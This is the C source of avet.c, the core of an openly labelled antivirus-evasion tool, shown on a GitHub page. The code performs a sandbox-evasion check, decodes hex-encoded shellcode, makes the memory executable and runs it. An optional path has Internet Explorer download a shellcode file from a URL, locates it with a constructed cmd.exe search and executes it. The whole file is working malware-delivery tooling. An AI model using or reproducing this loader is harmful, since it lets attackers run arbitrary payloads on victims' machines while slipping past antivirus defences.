-
Notifications
You must be signed in to change notification settings - Fork 32
/
avet.c
executable file
·380 lines (327 loc) · 9.13 KB
/
avet.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
/*
Author: Daniel Sauder
License: https://www.gnu.org/licenses/gpl.txt or LICENSE file
Web: https://github.com/govolution/avet
*/
// " .==,_ \n"
// " .===,_`\\ \n"
// " .====,_ ` \\ .====,__ \n"
// "--- .==-,`~. \\ `:`.__, \n"
// " --- `~~=-. \\ /^^^ MEEP MEEP \n"
// " --- `~~=. \\ / \n"
// " `~. \\ / \n"
// " ~. \\____./ \n"
// " `.=====) \n"
// " ___.--~~~--.__ \n"
// " ___\\.--~~~ ~~~---.._|/ \n"
// " ~~~\\\" / \n"
// " ________ ___ ___ _______ _________ \n"
// "|\\ __ \\|\\ \\ / /|\\ ___ \\|\\___ ___\\ \n"
// "\\ \\ \\|\\ \\ \\ \\ / / | \\ __/\\|___ \\ \\_| \n"
// " \\ \\ __ \\ \\ \\/ / / \\ \\ \\_|/__ \\ \\ \\ \n"
// " \\ \\ \\ \\ \\ \\ / / \\ \\ \\_|\\ \\ \\ \\ \\ \n"
// " \\ \\__\\ \\__\\ \\__/ / \\ \\_______\\ \\ \\__\\\n"
// " \\|__|\\|__|\\|__|/ \\|_______| \\|__|\n"
// "\n\nAnti Virus Evasion Tool by Daniel Sauder\n"
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <windows.h>
#include <tchar.h>
#include "defs.h"
int get_filesize(char *fvalue);
unsigned char* load_textfile(char *fvalue, unsigned char *buf, int size2);
unsigned char* decode_shellcode(unsigned char *buffer, unsigned char *shellcode, int size);
void exec_shellcode(unsigned char *shellcode);
void exec_shellcode64(unsigned char *shellcode);
#ifdef UVALUE
char* ie_download(char* string, char* sh_filename);
#endif
int main (int argc, char **argv)
{
char *fvalue = NULL;
char *uvalue = NULL;
int index;
int c;
opterr = 0;
// do evading here
#ifdef SANDBOX_FOPEN
#ifdef PRINT_DEBUG
printf("use fopen sandbox escape\n");
#endif
FILE *fp = fopen("c:\\windows\\system.ini", "rb");
if (fp == NULL)
return 0;
fclose(fp);
#endif
#ifdef LVALUE
fvalue=argv[1];
#endif
#ifdef PRINT_DEBUG
printf ("fvalue = %s ", fvalue);
printf ("uvalue = %s \n", uvalue);
for (index = optind; index < argc; index++)
printf ("Non-option argument %s\n", argv[index]);
#endif
// compute #defines from defs.h
#ifdef FVALUE
int size = strlen(FVALUE);
fvalue=(char*)malloc(size);
strcpy(fvalue,FVALUE);
#endif
#ifdef UVALUE
int size = strlen(UVALUE);
uvalue=(char*)malloc(size);
strcpy(uvalue,UVALUE);
#endif
// exec shellcode from a given file or from defs.h
if (fvalue)
{
unsigned char *buffer;
unsigned char *shellcode;
int size;
//#ifndef FVALUE
#ifdef LVALUE
#ifdef PRINT_DEBUG
printf("exec shellcode from file\n");
#endif
size = get_filesize(fvalue);
buffer = load_textfile(fvalue, buffer, size);
#endif
#ifdef FVALUE
size = strlen (FVALUE);
buffer = FVALUE;
#endif
#ifdef ENCRYPT
#ifdef PRINT_DEBUG
printf ("size %d\n",size);
//printf ("%s\n",FVALUE);
printf("exec shellcode with decode_shellcode\n");
#endif
shellcode = decode_shellcode(buffer,shellcode,size);
#endif
#ifndef ENCRYPT
#ifdef PRINT_DEBUG
printf("exec shellcode without decode_shellcode\n");
#endif
shellcode = buf;
#endif
#ifndef X64
exec_shellcode(shellcode);
#endif
#ifdef X64
exec_shellcode64(shellcode);
#endif
}
// exec from url
#ifdef UVALUE
else if (uvalue)
{
#ifdef PRINT_DEBUG
printf("exec shellcode from url\n");
#endif
char *sh_filename;
sh_filename = ie_download(uvalue, sh_filename);
int x=strlen(sh_filename);
#ifdef PRINT_DEBUG
printf("\n\n%d\n\n", x);
#endif
unsigned char *buffer;
unsigned char *shellcode;
int size = get_filesize(sh_filename);
buffer = load_textfile(sh_filename, buffer, size);
#ifdef ENCRYPT
shellcode = decode_shellcode(buffer,shellcode,size);
#else
shellcode = buf;
#endif
#ifndef X64
exec_shellcode(shellcode);
#endif
#ifdef X64
exec_shellcode64(shellcode);
#endif
}
#endif
return 0;
}
#if defined(LVALUE) || defined(UVALUE)
int get_filesize(char *fvalue)
{
int size,rc1;
FILE *fp1 = fopen(fvalue, "rb");
if (fp1 == NULL)
{
printf("get_filesize, %s not found\n", fvalue);
return 0;
}
for (size = 0; (rc1 = getc(fp1)) != EOF; size++) {}
fclose(fp1);
#ifdef PRINT_DEBUG
printf("get_filesize, filesize %s: %d\n", fvalue, size);
#endif
return size;
}
#endif
#if defined(LVALUE) || defined(UVALUE)
// return pointer to text buffer
unsigned char* load_textfile(char *fvalue, unsigned char *buffer, int size)
{
#ifdef PRINT_DEBUG
printf("load_textfile called: fvalue: %s, size: %d\n", fvalue, size);
#endif
//allocate buffer, open file, read file to the buffer, close the file
buffer=(unsigned char*)malloc(size+1);
int i, rc;
for (i=0; i<size; i++)
buffer[i]=0x0;
FILE *fp = fopen(fvalue, "rb");
if (fp == NULL)
{
printf("load_textfile, %s not found\n", fvalue);
return 0;
}
for (i=0; i<size; i++)
{
rc = getc(fp);
buffer[i] = rc;
}
#ifdef PRINT_DEBUG
printf("%s\n",buffer);
#endif
fclose(fp);
return buffer;
}
#endif
// return pointer to shellcode
unsigned char* decode_shellcode(unsigned char *buffer, unsigned char *shellcode, int size)
{
int j=0;
shellcode=malloc((size/2));
#ifdef PRINT_DEBUG
printf("decode_shellcode, size for malloc: %d\nShellcode output:\n",size/2);
#endif
int i=0;
do
{
unsigned char temp[3]={0};
sprintf((char*)temp,"%c%c",buffer[i],buffer[i+1]);
shellcode[j] = strtoul(temp, NULL, 16);
#ifdef PRINT_DEBUG
printf("%x",shellcode[j]);
#endif
i+=2;
j++;
} while(i<size);
#ifdef PRINT_DEBUG
printf("\n ");
#endif
return shellcode;
}
#ifndef X64
void exec_shellcode(unsigned char *shellcode)
{
#ifdef PRINT_DEBUG
printf("exec_shellcode\n ");
int size=strlen(shellcode);
printf("shellcode size: %d\n", size);
#endif
int (*funct)();
funct = (int (*)()) shellcode;
(int)(*funct)();
}
#endif
#ifdef X64
void exec_shellcode64(unsigned char *shellcode)
{
#ifdef PRINT_DEBUG
printf("exec_shellcode64\n ");
int size=strlen(shellcode);
printf("shellcode size: %d\n", size);
#endif
int len=strlen(shellcode);
DWORD l=0;
VirtualProtect(shellcode,len,PAGE_EXECUTE_READWRITE,&l);
(* (int(*)()) shellcode)();
}
#endif
#ifdef UVALUE
// return pointer to the filename
char* ie_download(char* string, char* sh_filename)
{
char ie[500];
GetEnvironmentVariable("PROGRAMFILES",ie,100);
strcat(ie,"\\Internet Explorer\\iexplore.exe");
ShellExecute(0, "open", ie , string, NULL, SW_SHOWDEFAULT);
// wait a little until the file is loaded
Sleep(8000);
// get the filename to search format in the ie temp directory
char delimiter[] = "/";
char *ptr;
char *fname;
ptr = strtok(string, delimiter);
while(ptr != NULL)
{
fname = ptr;
ptr = strtok(NULL, delimiter);
}
#ifdef PRINT_DEBUG
printf("ie_download, filename: %s\n", fname);
#endif
// split the filename
char delimiter2[] = ".";
char *sname;
ptr = strtok(fname, delimiter2);
sname = ptr;
ptr = strtok(NULL, delimiter2);
#ifdef PRINT_DEBUG
printf("ie_download, name to search for: %s\n", sname);
#endif
// search for the file in user profile
// build searchstring
char tmp[150];
char tmp_home[150];
GetEnvironmentVariable ("USERPROFILE",tmp_home,150);
GetEnvironmentVariable ("TEMP",tmp,150);
tmp [ strlen(tmp) - 5 ] = 0x0;
//printf("\n\n%s\n\n",tmp);
char searchstring[500] = "/C ";
strncat (searchstring,tmp_home,1);
strcat (searchstring,": && cd \"");
strcat (searchstring,tmp);
strcat (searchstring,"\" && dir . /s /b | find \"");
strcat (searchstring,sname);
strcat (searchstring,"\" > \"");
strcat (searchstring,tmp_home);
strcat (searchstring,"\\shellcodefile.txt\"");
#ifdef PRINT_DEBUG
printf ("ie_download, searchstring: %s\n", searchstring);
#endif
// build & execute cmd
char cmd[500];
GetEnvironmentVariable ("WINDIR",cmd,500);
strcat (cmd,"\\system32\\cmd.exe");
ShellExecute (0, "open", "cmd.exe" , searchstring, NULL, SW_SHOWDEFAULT);
//now read the directory + filename from the textfile
char dirfile[500] = {0};
strcat (dirfile, tmp_home);
strcat (dirfile, "\\shellcodefile.txt");
//char *sh_filename;
int size_sh_filename=0;
int counter = 0;
while(size_sh_filename==0 && counter <= 1000)
{
size_sh_filename = get_filesize (dirfile);
Sleep(500);
counter++;
}
sh_filename = load_textfile (dirfile, sh_filename, size_sh_filename);
// there is always emtpy space at the end of the file -> delete that
sh_filename[size_sh_filename-2]=0x0;
#ifdef PRINT_DEBUG
printf ("ie_download, sh_filename: >>>%s<<<, size: %d\ntest\n", sh_filename, size_sh_filename);
#endif
return sh_filename;
}
#endif